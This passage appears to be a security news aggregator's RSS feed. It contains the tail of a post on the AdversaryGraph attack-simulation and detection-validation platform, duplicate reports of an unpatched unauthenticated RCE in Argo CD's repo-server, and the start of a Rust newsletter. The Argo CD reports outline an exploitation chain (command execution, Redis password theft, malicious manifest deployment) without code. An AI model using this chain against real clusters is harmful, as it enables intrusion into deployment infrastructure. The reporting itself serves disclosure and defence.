v5.0, the workflow becomes:</p><ol><li>Select a credential-access or brute-force related TTP.</li><li>Choose the password spray scenario.</li><li>Run the lab or AI-assisted flow.</li><li>Observe authentication-related events.</li><li>Forward the events to the SIEM.</li><li>Confirm the parser.</li><li>Confirm the rule.</li><li>Review the chain graph.</li><li>Use Explain Attack to document what should have happened.</li><li>Record gaps.</li></ol><p>The important part is the chain. A single 4625-like event is not enough. A realistic validation should include many failures, many users, timing, source consistency, and possibly one later success.</p><h3>Example Use Case: Web Recon to Exploit-Shaped Telemetry</h3><p>For a web application detection scenario, the analyst may want to test:</p><ul><li>Path discovery.</li><li>Sensitive file probing.</li><li>SQL injection-shaped requests.</li><li>XSS-shaped requests.</li><li>SSRF-shaped requests.</li><li>WAF canary classification.</li><li>Access-log parser behavior.</li><li>SIEM dashboards for web attacks.</li></ul><p>AdversaryGraph can run approved web canaries against the lab web target, then show the real target-side logs in the UI.</p><p>This lets the detection engineer validate more than a rule. It validates whether the web tier emits usable logs and whether the SIEM receives enough context to detect the behavior.</p><h3>Example Use Case: Malware Findings to Detection Validation</h3><p>The malware module can produce findings such as:</p><ul><li>Suspicious imports.</li><li>Strings.</li><li>Packed sample indicators.</li><li>Function-level behavior.</li><li>Potential IOCs.</li><li>ATT&amp;CK candidates.</li><li>AI-assisted summaries.</li></ul><p>Those findings can feed detection engineering:</p><ul><li>Which API calls should we monitor?</li><li>Which command lines or process patterns matter?</li><li>Which persistence mechanisms appear?</li><li>Which network indicators are useful?</li><li>Which behaviors should become validation scenarios?</li></ul><p>AdversaryGraph’s value is that malware findings do not stay isolated in a reverse-engineering note. They can be connected back to ATT&amp;CK and validation planning.</p><h3>Example Use Case: Asset Inventory to Attack Surface</h3><p>Asset inventories often live in spreadsheets, CMDB exports, or scanner output. The security team may know what exists, but not how to translate that into likely ATT&amp;CK entry points.</p><p>The Asset Attack Surface module helps with:</p><ul><li>Normalizing assets.</li><li>Identifying exposed services.</li><li>Scoring exposure.</li><li>Mapping likely entry points.</li><li>Proposing ATT&amp;CK candidates.</li><li>Creating saved cases.</li></ul><p>This connects directly to Attack Simulation because a high-risk public web application or VPN service should map to validation scenarios around external discovery, exploitation attempts, credential attacks, and logging coverage.</p><h3>What This Release Is Not</h3><p>It is important to define what v5.0 is not.</p><p>It is not an autonomous attack platform.</p><p>It is not a malware execution system.</p><p>It is not a replacement for a full cyber range.</p><p>It is not attribution proof.</p><p>It is not a guarantee that a detection works in production.</p><p>It is an analyst-assistance and validation platform. Its output should be reviewed by qualified analysts and detection engineers before operational use.</p><h3>What Makes v5.0 Different</h3><p>The main difference is the connection between CTI and validation.</p><p>Many tools stop at one of these points:</p><ul><li>Visualize ATT&amp;CK.</li><li>Extract TTPs.</li><li>Store IOCs.</li><li>Generate sample logs.</li><li>Run a lab attack.</li><li>Forward events.</li></ul><p>AdversaryGraph tries to connect these into one workflow:</p><ol><li>Understand the behavior.</li><li>Map it.</li><li>Enrich it.</li><li>Simulate it safely.</li><li>Observe telemetry.</li><li>Send it to the SIEM.</li><li>Explain what happened.</li><li>Document what passed and what failed.</li></ol><p>That is the direction I want the platform to continue moving.</p><h3>Getting Started</h3><p>If you want to explore the public interface:</p><p><a href="https://1200km.com/threat-matrix/">AdversaryGraph Web - Public ATT&amp;CK Workspace for AdversaryGraph | 1200km</a></p><p><strong>If you want the full private platform:</strong></p><pre>git clone https://github.com/anpa1200/adversarygraph.git<br>cd adversarygraph<br>cp .env.example .env<br>docker compose up</pre><p><strong>Then open:</strong></p><pre>http://localhost:3000</pre><p><strong>Read the full documentation here:</strong></p><p><a href="https://1200km.com/adversarygraph-docs/">AdversaryGraph Documentation - CTI-to-Detection Workbench | 1200km</a></p><p><strong>Attack Simulation guide:</strong></p><p><a href="https://1200km.com/adversarygraph-docs/attack-simulation/">Attack Simulation | AdversaryGraph Documentation - CTI-to-Detection Workbench | 1200km</a></p><p><strong>Project page:</strong></p><p><a href="https://1200km.com/adversarygraph/">AdversaryGraph AI - CTI-to-Detection Platform</a></p><p><strong>GitHub release:</strong></p><p><a href="https://github.com/anpa1200/adversarygraph/releases/tag/v5.0.0">Release AdversaryGraph v5.0.0 · anpa1200/adversarygraph</a></p><h3>Final Thoughts</h3><p>AdversaryGraph v5.0 is a step toward a more complete CTI-to-detection workflow.</p><p>The platform is still built around a simple idea: intelligence should not end as a static report. It should become a mapped, enriched, validated, and explainable defensive workflow.</p><p>With Attack Simulation, SIEM forwarding, real lab telemetry, AI-assisted scenario generation, and attack-chain explanation, v5.0 moves AdversaryGraph closer to that goal.</p><p>The next challenge is to continue improving realism: more telemetry sources, more lab targets, better parser validation, stronger scenario libraries, and deeper connections between malware analysis, asset exposure, and detection engineering.</p><p>If you work in CTI, SOC operations, detection engineering, malware analysis, or purple-team validation, I would be glad to hear feedback.</p><p>Project:</p><p><a href="https://github.com/anpa1200/adversarygraph">https://github.com/anpa1200/adversarygraph</a></p><p>Documentation:</p><p><a href="https://1200km.com/adversarygraph-docs/">https://1200km.com/adversarygraph-docs/</a></p><p>Live workspace:</p><p><a href="https://1200km.com/threat-matrix/">AdversaryGraph Web - Public ATT&amp;CK Workspace for AdversaryGraph | 1200km</a></p><p>Main page:</p><p><a href="https://1200km.com/">Andrey Pautov - CTI &amp; Detection Engineering</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=21873b2a6c39" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39">AdversaryGraph v5.0: From CTI Mapping to Attack Simulation and SIEM Validation</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Argo CD flaw shows why GitOps infrastructure should be treated as tier zero]]></title>
<description><![CDATA[A newly disclosed vulnerability in Argo CD is drawing attention to the security risks of GitOps platforms, with researchers warning that the flaw could allow attackers who gain a foothold inside a Kubernetes cluster to execute code and manipulate application deployments.



Security firm Synackti...]]></description>
<link>https://tsecurity.de/de/3640960/ai-nachrichten/argo-cd-flaw-shows-why-gitops-infrastructure-should-be-treated-as-tier-zero/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640960/ai-nachrichten/argo-cd-flaw-shows-why-gitops-infrastructure-should-be-treated-as-tier-zero/</guid>
<pubDate>Thu, 02 Jul 2026 13:33:25 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A newly disclosed vulnerability in Argo CD is drawing attention to the security risks of GitOps platforms, with researchers warning that the flaw could allow attackers who gain a foothold inside a Kubernetes cluster to execute code and manipulate application deployments.</p>



<p>Security firm Synacktiv said in a <a href="https://www.synacktiv.com/en/publications/caught-in-the-octopus-trap-unauthenticated-rce-in-argo-cd-with-codeql" target="_blank" rel="noreferrer noopener">report</a> that the flaw affects Argo CD’s repo-server component, which fetches content from Git repositories and generates Kubernetes manifests used to deploy resources in a cluster. Argo CD is one of the most popular Kubernetes tools and is based on the GitOps paradigm.</p>



<p>“Argo CD requires significant privileges within the cluster,” Synacktiv said. “Additionally, it has access to private Git repositories, making it an attractive target for attackers.”</p>



<p>The issue centers on the repo-server’s unauthenticated GenerateManifest gRPC endpoint. Synacktiv said an attacker able to reach that endpoint could supply Kustomize options in a manifest generation request and abuse Kustomize’s Helm-related build options to execute attacker-controlled commands.</p>



<p>Exploitation requires access to both the repo-server gRPC port and the Redis database port, which should not be exposed to users. Argo CD provides Kubernetes network policies designed to prevent that scenario, but those protections are not enabled by default in Helm chart deployments, according to Synacktiv.</p>



<p>In such deployments, compromising a single pod inside the cluster could be enough to give an attacker the internal access needed to exploit the vulnerability.</p>



<p>Synacktiv said it was able to use the flaw to obtain the Redis password from the repo-server environment and access Argo CD’s Redis database. The researchers then manipulated cached deployment data, allowing a malicious manifest to be deployed automatically when Argo CD’s Auto Sync feature was enabled.</p>



<p>If Auto Sync is not enabled, exploitation would require a user to manually sync the application.</p>



<p>Synacktiv publicly disclosed the details on July 1 after first reporting the issue to Argo CD maintainers in January 2025. The vulnerability remains unpatched, and the firm recommended strict Kubernetes network policies to block untrusted pods from reaching the repo-server and Redis services until a fix is available.</p>



<h2 class="wp-block-heading">Assessing internal cluster exposure</h2>



<p>For CISOs, the key question is not only whether Argo CD is exposed to the internet, but whether <a href="https://www.csoonline.com/article/4151367/why-kubernetes-controllers-are-the-perfect-backdoor.html">other workloads</a> inside the Kubernetes cluster can reach its internal services.</p>



<p>“Because the repo-server’s gRPC service does not enforce authentication, any pod that can reach it becomes equivalent to an authenticated attacker,” said <a href="https://www.linkedin.com/in/devashri-datta-522b364b/" target="_blank" rel="noreferrer noopener">Devashri Datta</a>, a cybersecurity researcher. “In a typical cluster, that means any compromised application pod, misconfigured service mesh, or adjacent workload with local code execution can directly query the GenerateManifest endpoint or hit the Redis cache, no internet exposure required.”</p>



<p>Organizations should not equate “not internet-facing” with “low risk,” because modern attacks often begin with the compromise of an internal workload, according to <a href="https://my.idc.com/getdoc.jsp?containerId=PRF005665" target="_blank" rel="noreferrer noopener">Sakshi Grover</a>, senior research manager for cybersecurity services research at IDC Asia/Pacific.</p>



<p>“CISOs should therefore evaluate which workloads can communicate with the Argo CD control plane, whether east-west traffic is appropriately segmented, and whether unnecessary trust relationships exist between application workloads and GitOps infrastructure,” Grover said. “The assessment should focus on attack paths rather than perimeter exposure.”</p>



<h2 class="wp-block-heading">Treating GitOps as tier-zero</h2>



<p>The flaw also underscores the role GitOps platforms play in controlling software deployment across enterprise infrastructure.</p>



<p>“GitOps engines aren’t utility services; they’re tier-0 control-plane components,” Datta said. “By design, Argo CD holds read access to private repositories, sync/write access to target clusters, and custody of deployment secrets. It sits at the precise intersection of source code, configuration management, and live infrastructure.”</p>



<p>That level of access means an Argo CD compromise may extend beyond a single application. An attacker could turn the platform used to deploy applications into a channel for malicious manifests, while also interfering with auto-sync behavior and extracting credentials cached in supporting systems such as Redis.</p>



<p>A compromise of these platforms could influence <a href="https://www.csoonline.com/article/4165420/sap-npm-package-attack-highlights-risks-in-developer-tools-and-ci-cd-pipelines.html">software delivery at scale</a>, making them strategic assets that should be subject to stricter governance and privileged access controls similar to those applied to identity platforms and other critical management systems.</p>



<p><em>The article originally appeared on <a href="https://www.csoonline.com/article/4192188/argo-cd-flaw-shows-why-gitops-infrastructure-should-be-treated-as-tier-zero.html">CSO</a></em>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Argo CD flaw shows why GitOps infrastructure should be treated as tier zero]]></title>
<description><![CDATA[A newly disclosed vulnerability in Argo CD is drawing attention to the security risks of GitOps platforms, with researchers warning that the flaw could allow attackers who gain a foothold inside a Kubernetes cluster to execute code and manipulate application deployments.



Security firm Synackti...]]></description>
<link>https://tsecurity.de/de/3640930/it-security-nachrichten/argo-cd-flaw-shows-why-gitops-infrastructure-should-be-treated-as-tier-zero/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640930/it-security-nachrichten/argo-cd-flaw-shows-why-gitops-infrastructure-should-be-treated-as-tier-zero/</guid>
<pubDate>Thu, 02 Jul 2026 13:23:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A newly disclosed vulnerability in Argo CD is drawing attention to the security risks of GitOps platforms, with researchers warning that the flaw could allow attackers who gain a foothold inside a Kubernetes cluster to execute code and manipulate application deployments.</p>



<p>Security firm Synacktiv said in a <a href="https://www.synacktiv.com/en/publications/caught-in-the-octopus-trap-unauthenticated-rce-in-argo-cd-with-codeql" target="_blank" rel="noreferrer noopener">report</a> that the flaw affects Argo CD’s repo-server component, which fetches content from Git repositories and generates Kubernetes manifests used to deploy resources in a cluster. Argo CD is one of the most popular Kubernetes tools and is based on the GitOps paradigm.</p>



<p>“Argo CD requires significant privileges within the cluster,” Synacktiv said. “Additionally, it has access to private Git repositories, making it an attractive target for attackers.”</p>



<p>The issue centers on the repo-server’s unauthenticated GenerateManifest gRPC endpoint. Synacktiv said an attacker able to reach that endpoint could supply Kustomize options in a manifest generation request and abuse Kustomize’s Helm-related build options to execute attacker-controlled commands.</p>



<p>Exploitation requires access to both the repo-server gRPC port and the Redis database port, which should not be exposed to users. Argo CD provides Kubernetes network policies designed to prevent that scenario, but those protections are not enabled by default in Helm chart deployments, according to Synacktiv.</p>



<p>In such deployments, compromising a single pod inside the cluster could be enough to give an attacker the internal access needed to exploit the vulnerability.</p>



<p>Synacktiv said it was able to use the flaw to obtain the Redis password from the repo-server environment and access Argo CD’s Redis database. The researchers then manipulated cached deployment data, allowing a malicious manifest to be deployed automatically when Argo CD’s Auto Sync feature was enabled.</p>



<p>If Auto Sync is not enabled, exploitation would require a user to manually sync the application.</p>



<p>Synacktiv publicly disclosed the details on July 1, 2026, after first reporting the issue to Argo CD maintainers in January 2025. The vulnerability remains unpatched, and the firm recommended strict Kubernetes network policies to block untrusted pods from reaching the repo-server and Redis services until a fix is available.</p>



<h2 class="wp-block-heading">Assessing internal cluster exposure</h2>



<p>For CISOs, the key question is not only whether Argo CD is exposed to the internet, but whether <a href="https://www.csoonline.com/article/4151367/why-kubernetes-controllers-are-the-perfect-backdoor.html">other workloads</a> inside the Kubernetes cluster can reach its internal services.</p>



<p>“Because the repo-server’s gRPC service does not enforce authentication, any pod that can reach it becomes equivalent to an authenticated attacker,” said <a href="https://www.linkedin.com/in/devashri-datta-522b364b/" target="_blank" rel="noreferrer noopener">Devashri Datta</a>, a cybersecurity researcher. “In a typical cluster, that means any compromised application pod, misconfigured service mesh, or adjacent workload with local code execution can directly query the GenerateManifest endpoint or hit the Redis cache, no internet exposure required.”</p>



<p>Organizations should not equate “not internet-facing” with “low risk,” because modern attacks often begin with the compromise of an internal workload, according to <a href="https://my.idc.com/getdoc.jsp?containerId=PRF005665" target="_blank" rel="noreferrer noopener">Sakshi Grover</a>, senior research manager for cybersecurity services research at IDC Asia/Pacific.</p>



<p>“CISOs should therefore evaluate which workloads can communicate with the Argo CD control plane, whether east-west traffic is appropriately segmented, and whether unnecessary trust relationships exist between application workloads and GitOps infrastructure,” Grover said. “The assessment should focus on attack paths rather than perimeter exposure.”</p>



<h2 class="wp-block-heading">Treating GitOps as tier-zero</h2>



<p>The flaw also underscores the role GitOps platforms play in controlling software deployment across enterprise infrastructure.</p>



<p>“GitOps engines aren’t utility services; they’re tier-0 control-plane components,” Datta said. “By design, Argo CD holds read access to private repositories, sync/write access to target clusters, and custody of deployment secrets. It sits at the precise intersection of source code, configuration management, and live infrastructure.”</p>



<p>That level of access means an Argo CD compromise may extend beyond a single application. An attacker could turn the platform used to deploy applications into a channel for malicious manifests, while also interfering with auto-sync behavior and extracting credentials cached in supporting systems such as Redis.</p>



<p>A compromise of these platforms could influence <a href="https://www.csoonline.com/article/4165420/sap-npm-package-attack-highlights-risks-in-developer-tools-and-ci-cd-pipelines.html">software delivery at scale</a>, making them strategic assets that should be subject to stricter governance and privileged access controls similar to those applied to identity platforms and other critical management systems.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Argo-CD-repo-server ohne Authentifizierung: Schwachstelle gefährdet Kubernetes-Cluster]]></title>
<description><![CDATA[BERLIN / LONDON (IT BOLTWISE) – Branchenexperten warnen vor einer ungepatchten Schwachstelle im Argo-CD-„repo-server“, die bereits mit Erreichbarkeit eines internen Ports Angreifer Code ausführen lassen kann. Synacktiv zeigt, wie daraus bis zur Cluster-Übernahme werden kann, inklusive Manipulatio...]]></description>
<link>https://tsecurity.de/de/3640835/it-security-nachrichten/argo-cd-repo-server-ohne-authentifizierung-schwachstelle-gefaehrdet-kubernetes-cluster/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640835/it-security-nachrichten/argo-cd-repo-server-ohne-authentifizierung-schwachstelle-gefaehrdet-kubernetes-cluster/</guid>
<pubDate>Thu, 02 Jul 2026 12:52:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-argo-cd-repo-server-redis-risiko.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-argo-cd-repo-server-redis-risiko.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-argo-cd-repo-server-redis-risiko-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-argo-cd-repo-server-redis-risiko-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-argo-cd-repo-server-redis-risiko-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-argo-cd-repo-server-redis-risiko-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-argo-cd-repo-server-redis-risiko-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BERLIN / LONDON (IT BOLTWISE) – Branchenexperten warnen vor einer ungepatchten Schwachstelle im Argo-CD-„repo-server“, die bereits mit Erreichbarkeit eines internen Ports Angreifer Code ausführen lassen kann. Synacktiv zeigt, wie daraus bis zur Cluster-Übernahme werden kann, inklusive Manipulation des Deployment-Caches über Redis. Weil es keine fixierte Version und keine CVE gibt, bleibt als praktische Sofortmaßnahme vor […]</p>
<div><a href="https://www.it-boltwise.de/argo-cd-repo-server-ohne-authentifizierung-schwachstelle-gefaehrdet-kubernetes-cluster.html">... den vollständigen Artikel <strong>»Argo-CD-repo-server ohne Authentifizierung: Schwachstelle gefährdet Kubernetes-Cluster«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/argo-cd-repo-server-ohne-authentifizierung-schwachstelle-gefaehrdet-kubernetes-cluster.html">Argo-CD-repo-server ohne Authentifizierung: Schwachstelle gefährdet Kubernetes-Cluster</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 658]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3640170/tools/this-week-in-rust-this-week-in-rust-658/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640170/tools/this-week-in-rust-this-week-in-rust-658/</guid>
<pubDate>Thu, 02 Jul 2026 07:10:00 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#official">Official</a></h5>
<ul>
<li><a href="https://blog.rust-lang.org/2026/06/30/Rust-1.96.1/">Announcing Rust 1.96.1 | Rust Blog</a></li>
<li><a href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/">The many journeys of learning Rust | Rust Blog</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#foundation">Foundation</a></h5>
<ul>
<li><a href="https://rustfoundation.org/media/rust-foundation-trusted-training-program-launches-giving-learners-a-mark-of-quality-to-trust/">Rust Foundation Trusted Training Program Launches, Giving Learners a Mark of Quality to Trust</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#newsletters">Newsletters</a></h5>
<ul>
<li><a href="https://scientificcomputing.rs/monthly/2026-06">Scientific Computing in Rust #19 (June 2026)</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://slint.dev/blog/slint-1.17-released">Slint 1.17 Released</a></li>
<li><a href="https://blog.antoyo.xyz/rustc_codegen_gcc-progress-report-42">rustc_codegen_gcc: Progress Report #42</a></li>
<li><a href="https://hovinen.me/announcements/2026/06/24/introducing-test-that.html">Introducing Test That!</a></li>
<li><a href="https://hovinen.me/announcements/2026/06/24/introducing-test-that.html">Introducing Test That!: A rich test assertion library for Rust from the original author of GoogleTest Rust</a></li>
<li><a href="https://github.com/shihuili1218/rssh/blob/main/docs/article_arch_en.md">Inside RSSH: one Rust crate, three binaries, and the Tauri lessons along the way</a></li>
<li><a href="https://github.com/Aleixenandros/Rustty/releases/tag/v1.38.0">Rustty 1.38 – accessibility &amp; keyboard nav</a></li>
<li><a href="https://www.willsearch.com.br/blog/2026/06/25/guardiandb-0-17-0-secure-namespaces-iroh-1-0-and-the-arrival-of-the-odm/">GuardianDB 0.17.0: Secure namespaces, Iroh 1.0, and the arrival of the ODM</a></li>
<li><a href="https://dev.to/iam_suriyan_b9078a5b3a553/building-a-real-time-voice-agent-runtime-in-rust-no-gil-one-binary-2000-calls-a-box-12ko">Building a real-time voice-agent runtime in Rust: no GIL, one binary, 2,000 calls a box</a></li>
<li><a href="https://aimdb.dev/blog/aimdb-bring-your-own-connector">AimDB: Bring Your Own Connector</a></li>
<li><a href="https://github.com/kunobi-ninja/kache/releases/tag/v0.8.0">kache 0.8.0: zero-copy restores on Windows (ReFS)</a></li>
<li><a href="https://miskibin.github.io/warbell/">Warbell — a castle-defense action-RPG built with Bevy 0.19</a></li>
<li><a href="https://dev.to/gregorymc86/i-built-a-macos-ftp-client-entirely-in-rust-no-electron-no-webview-2a8i">I built a macOS FTP client entirely in Rust - no Electron, no webview</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li><a href="https://blog.yoshuawuyts.com/hoisting-expressions">Hoisting Expressions</a></li>
<li><a href="https://blog.jetbrains.com/rust/2026/06/25/rust-web-development-2026/">The Unglamorous Side of Rust Web Development</a></li>
<li><a href="https://dev.to/ernesto_arias_148b35bc25d/-how-i-found-out-52-of-my-knowledge-graph-was-duplicates-and-what-i-did-about-it-3coh">How I Found Out 52% of My Knowledge Graph Was Duplicates (and What I Did About It)</a></li>
<li><a href="https://jtjlehi.github.io/2026/06/25/novel-rust-error-handling.html">A Novel Approach to Rust Error Handling</a></li>
<li><a href="https://encore.dev/blog/redis-runtime">We put a Redis server inside our runtime</a></li>
<li><a href="https://kerkour.com/rust-high-performance-memory-fragmentation-allocations">High-performance Rust: Understanding and eliminating memory fragmentation</a></li>
<li><a href="https://kunobi.ninja/blog/kache-storage-worktrees">AI and worktrees are filling our disks: kache storage, measured</a></li>
<li><a href="https://dev.to/sicklefire/designing-a-cross-platform-terminal-memory-visualizer-in-rust-2365">Designing a cross-platform terminal memory visualizer in Rust</a></li>
<li><a href="https://pranitha.dev/posts/rust-and-memory-allocators">Your Rust Service Isn't Leaking — It Could Be the Allocator</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li><a href="https://medium.com/@vbasky/measure-dont-guess-building-viser-a-content-adaptive-video-encoding-optimizer-in-rust-7675edd6943a">Measure, Don't Guess: Building viser, a Content-Adaptive Video Encoding Optimizer in Rust</a></li>
<li><a href="https://blog.sheerluck.dev/posts/learn-sql-and-sqlx-by-building-a-book-library-cli-in-rust/">Learn SQL and SQLx by Building a Book Library CLI in Rust</a></li>
<li>[series] <a href="https://aibodh.com/posts/async-rust-chapter-2-what-async-fn-compiles-into/">Reasoning About Async Rust with State Machines</a></li>
<li><a href="https://mainmatter.com/c-to-rust-migration-book/">The C to Rust Migration Book</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://github.com/pbkx/deconvolution">deconvolution</a>, a image deconvolution and restoration library.</p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1621">pbkx</a> for the self-suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>
<p><a href="https://github.com/kmolan/multicalc-rust/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22">multicalc - good first issues</a></p>



<ul>
<li><a href="https://github.com/aimdb-dev/aimdb/issues/93">AimDB - Add minimal example: hello-single-latest</a></li>
<li><a href="https://github.com/aimdb-dev/aimdb/issues/109">AimDB - Wire <code>.transform()</code> and <code>.transform_join()</code> into stage profiling</a></li>
<li><a href="https://github.com/SzilvasiPeter/edid-info/issues/1">edid-info - Increase test coverage with real EDID data</a></li>
<li><a href="https://github.com/SzilvasiPeter/edid-info/issues/2">edid-info - Finalize CTA-861 extension implementation</a></li>
<li><a href="https://github.com/SzilvasiPeter/edid-info/issues/3">edid-info - Support additional EDID extension block types</a></li>
</ul>
<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>



<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>426 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-06-23..2026-06-30">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/157996">drop the full-crate AST walk in <code>check_unused</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158185">make <code>stable_crate_ids</code> reads lock-free after crate loading</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158239">rework lint pass running</a></li>
